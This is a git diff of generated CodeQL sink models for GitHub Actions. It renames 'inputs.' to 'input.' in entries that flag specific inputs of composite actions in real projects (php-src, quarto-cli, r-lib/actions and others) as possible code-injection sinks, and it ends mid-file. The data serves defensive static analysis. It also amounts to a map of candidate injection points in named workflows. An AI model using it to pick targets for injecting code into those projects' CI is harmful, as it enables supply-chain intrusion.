diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml
index 4bc0d5f660d5..55a87e2df670 100644
--- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml
+++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["pennylaneai/pennylane", "*", "inputs.requirements_file", "code-injection", "generated"]
- - ["pennylaneai/pennylane", "*", "inputs.additional_pip_packages", "code-injection", "generated"]
\ No newline at end of file
+ - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"]
+ - ["pennylaneai/pennylane", "*", "input.additional_pip_packages", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml
index 5f38860c86dd..158aafbd1158 100644
--- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml
+++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml
@@ -3,11 +3,11 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["phalcon/cphalcon", "*", "inputs.target-name", "code-injection", "generated"]
- - ["phalcon/cphalcon", "*", "inputs.ext-path", "code-injection", "generated"]
- - ["phalcon/cphalcon", "*", "inputs.pecl", "code-injection", "generated"]
- - ["phalcon/cphalcon", "*", "inputs.arch", "code-injection", "generated"]
- - ["phalcon/cphalcon", "*", "inputs.msvc", "code-injection", "generated"]
- - ["phalcon/cphalcon", "*", "inputs.ts", "code-injection", "generated"]
- - ["phalcon/cphalcon", "*", "inputs.php_version", "code-injection", "generated"]
- - ["phalcon/cphalcon", "*", "inputs.php-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"]
+ - ["phalcon/cphalcon", "*", "input.ext-path", "code-injection", "generated"]
+ - ["phalcon/cphalcon", "*", "input.pecl", "code-injection", "generated"]
+ - ["phalcon/cphalcon", "*", "input.arch", "code-injection", "generated"]
+ - ["phalcon/cphalcon", "*", "input.msvc", "code-injection", "generated"]
+ - ["phalcon/cphalcon", "*", "input.ts", "code-injection", "generated"]
+ - ["phalcon/cphalcon", "*", "input.php_version", "code-injection", "generated"]
+ - ["phalcon/cphalcon", "*", "input.php-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml
index 3122d89f28f8..ff12a54e97af 100644
--- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml
+++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["philosowaffle/peloton-to-garmin", "*", "inputs.framework", "code-injection", "generated"]
- - ["philosowaffle/peloton-to-garmin", "*", "inputs.os", "code-injection", "generated"]
+ - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"]
+ - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"]
 - addsTo:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml
index 7767c6497806..1a92afe11a40 100644
--- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml
+++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["php/php-src", "*", "inputs.jitType", "code-injection", "generated"]
- - ["php/php-src", "*", "inputs.runTestsParameters", "code-injection", "generated"]
- - ["php/php-src", "*", "inputs.token", "code-injection", "generated"]
- - ["php/php-src", "*", "inputs.configurationParameters", "code-injection", "generated"]
- - ["php/php-src", "*", "inputs.libmysql", "code-injection", "generated"]
\ No newline at end of file
+ - ["php/php-src", "*", "input.jitType", "code-injection", "generated"]
+ - ["php/php-src", "*", "input.runTestsParameters", "code-injection", "generated"]
+ - ["php/php-src", "*", "input.token", "code-injection", "generated"]
+ - ["php/php-src", "*", "input.configurationParameters", "code-injection", "generated"]
+ - ["php/php-src", "*", "input.libmysql", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml
index 419909764b7d..38f2399b368e 100644
--- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml
+++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["phpdocumentor/phpdocumentor", "*", "inputs.passphrase", "code-injection", "generated"]
- - ["phpdocumentor/phpdocumentor", "*", "inputs.secret-key", "code-injection", "generated"]
\ No newline at end of file
+ - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"]
+ - ["phpdocumentor/phpdocumentor", "*", "input.secret-key", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml
index 6e2b5247f292..36e983b8039b 100644
--- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml
+++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["pinecone-io/pinecone-python-client", "*", "inputs.googleapis_common_protos_version", "code-injection", "generated"]
- - ["pinecone-io/pinecone-python-client", "*", "inputs.protobuf_version", "code-injection", "generated"]
- - ["pinecone-io/pinecone-python-client", "*", "inputs.lz4_version", "code-injection", "generated"]
- - ["pinecone-io/pinecone-python-client", "*", "inputs.grpcio_version", "code-injection", "generated"]
- - ["pinecone-io/pinecone-python-client", "*", "inputs.pinecone_client_version", "code-injection", "generated"]
\ No newline at end of file
+ - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"]
+ - ["pinecone-io/pinecone-python-client", "*", "input.protobuf_version", "code-injection", "generated"]
+ - ["pinecone-io/pinecone-python-client", "*", "input.lz4_version", "code-injection", "generated"]
+ - ["pinecone-io/pinecone-python-client", "*", "input.grpcio_version", "code-injection", "generated"]
+ - ["pinecone-io/pinecone-python-client", "*", "input.pinecone_client_version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml
index d012a6f2fbb3..006a53e83761 100644
--- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml
+++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["pixijs/pixijs", "*", "inputs.npm-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml
index aead619b40be..5410cb3ff306 100644
--- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml
+++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["posthog/posthog", "*", "inputs.group", "code-injection", "generated"]
- - ["posthog/posthog", "*", "inputs.concurrency", "code-injection", "generated"]
\ No newline at end of file
+ - ["posthog/posthog", "*", "input.group", "code-injection", "generated"]
+ - ["posthog/posthog", "*", "input.concurrency", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml
index b82360205f74..124b3cf2a5a7 100644
--- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml
+++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["primer/react", "*", "inputs.token", "code-injection", "generated"]
- - ["primer/react", "*", "inputs.schedule-id", "code-injection", "generated"]
\ No newline at end of file
+ - ["primer/react", "*", "input.token", "code-injection", "generated"]
+ - ["primer/react", "*", "input.schedule-id", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml
index e5fad4e5256e..8542583f3d94 100644
--- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml
+++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["project-chip/connectedhomeip", "*", "inputs.with", "code-injection", "generated"]
- - ["project-chip/connectedhomeip", "*", "inputs.action", "code-injection", "generated"]
- - ["project-chip/connectedhomeip", "*", "inputs.platform", "code-injection", "generated"]
\ No newline at end of file
+ - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"]
+ - ["project-chip/connectedhomeip", "*", "input.action", "code-injection", "generated"]
+ - ["project-chip/connectedhomeip", "*", "input.platform", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml
index 71f90682b1bb..e85e58fb40a2 100644
--- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml
+++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["projectnessie/nessie", "*", "inputs.job-name", "code-injection", "generated"]
- - ["projectnessie/nessie", "*", "inputs.java-version", "code-injection", "generated"]
- - ["projectnessie/nessie", "*", "inputs.job-instance", "code-injection", "generated"]
- - ["projectnessie/nessie", "*", "inputs.job-id", "code-injection", "generated"]
\ No newline at end of file
+ - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"]
+ - ["projectnessie/nessie", "*", "input.java-version", "code-injection", "generated"]
+ - ["projectnessie/nessie", "*", "input.job-instance", "code-injection", "generated"]
+ - ["projectnessie/nessie", "*", "input.job-id", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml
index 07421b98859a..d2005f3788a3 100644
--- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml
+++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["psf/black", "*", "inputs.summary", "code-injection", "generated"]
\ No newline at end of file
+ - ["psf/black", "*", "input.summary", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml
index 81fbb3ae9e43..7340dfccdd0d 100644
--- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml
+++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["pyca/cryptography", "*", "inputs.key", "code-injection", "generated"]
\ No newline at end of file
+ - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml
index 9587351ce1d6..70022866bdd4 100644
--- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml
+++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["pyg-team/pytorch/geometric", "*", "inputs.torchvision-version", "code-injection", "generated"]
- - ["pyg-team/pytorch/geometric", "*", "inputs.cuda-version", "code-injection", "generated"]
- - ["pyg-team/pytorch/geometric", "*", "inputs.torch-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"]
+ - ["pyg-team/pytorch/geometric", "*", "input.cuda-version", "code-injection", "generated"]
+ - ["pyg-team/pytorch/geometric", "*", "input.torch-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml
index 080835504a6b..f7bd43cbc1e0 100644
--- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml
+++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["python-poetry/poetry", "*", "inputs.args", "code-injection", "generated"]
\ No newline at end of file
+ - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml
index 86ce393fbc57..d85a35580b65 100644
--- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml
+++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["python/mypy", "*", "inputs.install_project_dependencies", "code-injection", "generated"]
- - ["python/mypy", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
+ - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"]
+ - ["python/mypy", "*", "input.version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml
index 182558589d78..ee0b51c72b43 100644
--- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml
+++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml
@@ -3,13 +3,13 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["quarto-dev/quarto-cli", "*", "inputs.keychain-pw", "code-injection", "generated"]
- - ["quarto-dev/quarto-cli", "*", "inputs.keychain", "code-injection", "generated"]
- - ["quarto-dev/quarto-cli", "*", "inputs.certificate-file", "code-injection", "generated"]
- - ["quarto-dev/quarto-cli", "*", "inputs.certificate-value", "code-injection", "generated"]
- - ["quarto-dev/quarto-cli", "*", "inputs.working-dir", "code-injection", "generated"]
- - ["quarto-dev/quarto-cli", "*", "inputs.bucket", "code-injection", "generated"]
- - ["quarto-dev/quarto-cli", "*", "inputs.base-url", "code-injection", "generated"]
- - ["quarto-dev/quarto-cli", "*", "inputs.files", "code-injection", "generated"]
- - ["quarto-dev/quarto-cli", "*", "inputs.binary-name", "code-injection", "generated"]
- - ["quarto-dev/quarto-cli", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
+ - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"]
+ - ["quarto-dev/quarto-cli", "*", "input.keychain", "code-injection", "generated"]
+ - ["quarto-dev/quarto-cli", "*", "input.certificate-file", "code-injection", "generated"]
+ - ["quarto-dev/quarto-cli", "*", "input.certificate-value", "code-injection", "generated"]
+ - ["quarto-dev/quarto-cli", "*", "input.working-dir", "code-injection", "generated"]
+ - ["quarto-dev/quarto-cli", "*", "input.bucket", "code-injection", "generated"]
+ - ["quarto-dev/quarto-cli", "*", "input.base-url", "code-injection", "generated"]
+ - ["quarto-dev/quarto-cli", "*", "input.files", "code-injection", "generated"]
+ - ["quarto-dev/quarto-cli", "*", "input.binary-name", "code-injection", "generated"]
+ - ["quarto-dev/quarto-cli", "*", "input.version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml
index 1839670baa2c..524a1f54ae41 100644
--- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml
+++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml
@@ -3,9 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["quay/clair", "*", "inputs.tag", "code-injection", "generated"]
- - ["quay/clair", "*", "inputs.repo", "code-injection", "generated"]
- - ["quay/clair", "*", "inputs.quay", "code-injection", "generated"]
- - ["quay/clair", "*", "inputs.duration", "code-injection", "generated"]
- - ["quay/clair", "*", "inputs.token", "code-injection", "generated"]
- - ["quay/clair", "*", "inputs.dir", "code-injection", "generated"]
\ No newline at end of file
+ - ["quay/clair", "*", "input.tag", "code-injection", "generated"]
+ - ["quay/clair", "*", "input.repo", "code-injection", "generated"]
+ - ["quay/clair", "*", "input.quay", "code-injection", "generated"]
+ - ["quay/clair", "*", "input.duration", "code-injection", "generated"]
+ - ["quay/clair", "*", "input.token", "code-injection", "generated"]
+ - ["quay/clair", "*", "input.dir", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml
index 203dabaa3b9f..310f11ed1603 100644
--- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml
+++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["quickwit-oss/quickwit", "*", "inputs.target", "code-injection", "generated"]
- - ["quickwit-oss/quickwit", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
+ - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"]
+ - ["quickwit-oss/quickwit", "*", "input.version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml
index 7247d125324a..441b824581c4 100644
--- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml
+++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml
@@ -3,16 +3,16 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["r-lib/actions", "*", "inputs.lockfile-create-lib", "code-injection", "generated"]
- - ["r-lib/actions", "*", "inputs.dependencies", "code-injection", "generated"]
- - ["r-lib/actions", "*", "inputs.upgrade", "code-injection", "generated"]
- - ["r-lib/actions", "*", "inputs.pak-version", "code-injection", "generated"]
- - ["r-lib/actions", "*", "inputs.profile", "code-injection", "generated"]
- - ["r-lib/actions", "*", "inputs.install-pandoc", "code-injection", "generated"]
- - ["r-lib/actions", "*", "inputs.extra-packages", "code-injection", "generated"]
- - ["r-lib/actions", "*", "inputs.packages", "code-injection", "generated"]
- - ["r-lib/actions", "*", "inputs.needs", "code-injection", "generated"]
- - ["r-lib/actions", "*", "inputs.error-on", "code-injection", "generated"]
- - ["r-lib/actions", "*", "inputs.build_args", "code-injection", "generated"]
- - ["r-lib/actions", "*", "inputs.args", "code-injection", "generated"]
- - ["r-lib/actions", "*", "inputs.check-dir", "code-injection", "generated"]
\ No newline at end of file
+ - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"]
+ - ["r-lib/actions", "*", "input.dependencies", "code-injection", "generated"]
+ - ["r-lib/actions", "*", "input.upgrade", "code-injection", "generated"]
+ - ["r-lib/actions", "*", "input.pak-version", "code-injection", "generated"]
+ - ["r-lib/actions", "*", "input.profile", "code-injection", "generated"]
+ - ["r-lib/actions", "*", "input.install-pandoc", "code-injection", "generated"]
+ - ["r-lib/actions", "*", "input.extra-packages", "code-injection", "generated"]
+ - ["r-lib/actions", "*", "input.packages", "code-injection", "generated"]
+ - ["r-lib/actions", "*", "input.needs", "code-injection", "generated"]
+ - ["r-lib/actions", "*", "input.error-on", "code-injection", "generated"]
+ - ["r-lib/actions", "*", "input.build_args", "code-injection", "generated"]
+ - ["r-lib/actions", "*", "input.args", "code-injection", "generated"]
+ - ["r-lib/actions", "*", "input.check-dir", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml
index 22c8a56deacb..19f9f7a03bb8 100644
--- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml
+++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["randombit/botan", "*", "inputs.target", "code-injection", "generated"]
- - ["randombit/botan", "*", "inputs.arch", "code-injection", "generated"]
\ No newline at end of file
+ - ["randombit/botan", "*", "input.target", "code-injection", "generated"]
+ - ["randombit/botan", "*", "input.arch", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml
index 7476425a35f7..1ca71afacc7e 100644
--- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml
+++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["raspberrypi/documentation", "*", "inputs.secondary_host", "code-injection", "generated"]
- - ["raspberrypi/documentation", "*", "inputs.destination", "code-injection", "generated"]
- - ["raspberrypi/documentation", "*", "inputs.source", "code-injection", "generated"]
- - ["raspberrypi/documentation", "*", "inputs.bastion_host", "code-injection", "generated"]
- - ["raspberrypi/documentation", "*", "inputs.primary_host", "code-injection", "generated"]
- - ["raspberrypi/documentation", "*", "inputs.public_bastion_host_keys", "code-injection", "generated"]
- - ["raspberrypi/documentation", "*", "inputs.private_ssh_key", "code-injection", "generated"]
\ No newline at end of file
+ - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"]
+ - ["raspberrypi/documentation", "*", "input.destination", "code-injection", "generated"]
+ - ["raspberrypi/documentation", "*", "input.source", "code-injection", "generated"]
+ - ["raspberrypi/documentation", "*", "input.bastion_host", "code-injection", "generated"]
+ - ["raspberrypi/documentation", "*", "input.primary_host", "code-injection", "generated"]
+ - ["raspberrypi/documentation", "*", "input.public_bastion_host_keys", "code-injection", "generated"]
+ - ["raspberrypi/documentation", "*", "input.private_ssh_key", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml
index 3c96c1b159db..9f0ff2c86de4 100644
--- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml
+++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["ray-project/kuberay", "*", "inputs.ray_version", "code-injection", "generated"]
\ No newline at end of file
+ - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml
index da9def79964b..abb6c432aeff 100644
--- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml
+++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["readthedocs/actions", "*", "inputs.single-version", "code-injection", "generated"]
- - ["readthedocs/actions", "*", "inputs.platform", "code-injection", "generated"]
- - ["readthedocs/actions", "*", "inputs.message-template", "code-injection", "generated"]
- - ["readthedocs/actions", "*", "inputs.project-language", "code-injection", "generated"]
- - ["readthedocs/actions", "*", "inputs.project-slug", "code-injection", "generated"]
\ No newline at end of file
+ - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"]
+ - ["readthedocs/actions", "*", "input.platform", "code-injection", "generated"]
+ - ["readthedocs/actions", "*", "input.message-template", "code-injection", "generated"]
+ - ["readthedocs/actions", "*", "input.project-language", "code-injection", "generated"]
+ - ["readthedocs/actions", "*", "input.project-slug", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml
index 80c917396846..6548880f59ed 100644
--- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml
+++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["reflex-dev/reflex", "*", "inputs.create-venv-at-path", "code-injection", "generated"]
\ No newline at end of file
+ - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml
index 2121bb23710b..5401d1760513 100644
--- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml
+++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["renovatebot/renovate", "*", "inputs.node-version", "code-injection", "generated"]
\ No newline at end of file
+ - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml
index f0acc3056726..70cf81f1b787 100644
--- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml
+++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["rethinkdb/rethinkdb", "*", "inputs.command", "code-injection", "generated"]
- - ["rethinkdb/rethinkdb", "*", "inputs.install_command", "code-injection", "generated"]
- - ["rethinkdb/rethinkdb", "*", "inputs.env_activate", "code-injection", "generated"]
- - ["rethinkdb/rethinkdb", "*", "inputs.default_python_driver_commit_hash", "code-injection", "generated"]
\ No newline at end of file
+ - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"]
+ - ["rethinkdb/rethinkdb", "*", "input.install_command", "code-injection", "generated"]
+ - ["rethinkdb/rethinkdb", "*", "input.env_activate", "code-injection", "generated"]
+ - ["rethinkdb/rethinkdb", "*", "input.default_python_driver_commit_hash", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml
index f099314b16e4..eccccba83feb 100644
--- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml
+++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["risc0/risc0", "*", "inputs.key", "code-injection", "generated"]
- - ["risc0/risc0", "*", "inputs.components", "code-injection", "generated"]
- - ["risc0/risc0", "*", "inputs.targets", "code-injection", "generated"]
- - ["risc0/risc0", "*", "inputs.toolchain", "code-injection", "generated"]
\ No newline at end of file
+ - ["risc0/risc0", "*", "input.key", "code-injection", "generated"]
+ - ["risc0/risc0", "*", "input.components", "code-injection", "generated"]
+ - ["risc0/risc0", "*", "input.targets", "code-injection", "generated"]
+ - ["risc0/risc0", "*", "input.toolchain", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml
index 971cd92e3cd6..b7133aae3049 100644
--- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml
+++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["rocketchat/rocket.chat", "*", "inputs.build-containers", "code-injection", "generated"]
- - ["rocketchat/rocket.chat", "*", "inputs.release", "code-injection", "generated"]
- - ["rocketchat/rocket.chat", "*", "inputs.docker-tag", "code-injection", "generated"]
- - ["rocketchat/rocket.chat", "*", "inputs.root-dir", "code-injection", "generated"]
